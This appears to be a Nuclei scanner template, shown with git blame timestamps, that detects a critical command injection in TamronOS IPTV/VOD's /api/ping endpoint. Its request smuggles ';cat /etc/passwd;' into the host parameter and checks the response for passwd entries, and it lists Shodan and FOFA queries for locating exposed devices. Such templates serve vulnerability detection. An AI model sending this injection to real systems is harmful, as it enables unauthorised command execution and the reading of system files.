nuclei-templates/vulnerabilities/other/tamronos-rce.yaml

38 lines
905 B
YAML
Raw Normal View History

2021-06-17 01:31:59 +00:00
id: tamronos-rce
info:
name: TamronOS IPTV/VOD - Remote Command Execution
2021-06-17 01:31:59 +00:00
author: pikpikcu
severity: critical
2022-05-16 17:54:13 +00:00
description: |
TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint.
reference:
- https://twitter.com/sec715/status/1405336456923471874
2022-05-16 18:04:07 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-78
metadata:
verified: true
shodan-query: title:"TamronOS IPTV系统"
fofa-query: title="TamronOS IPTV系统"
2022-05-16 20:14:51 +00:00
tags: tamronos,rce
2021-06-17 01:31:59 +00:00
requests:
- method: GET
path:
2021-06-17 01:34:49 +00:00
- "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"
2021-06-17 01:31:59 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-06-17 01:31:59 +00:00
- type: status
status:
- 200
# Enhanced by cs on 2022/05/13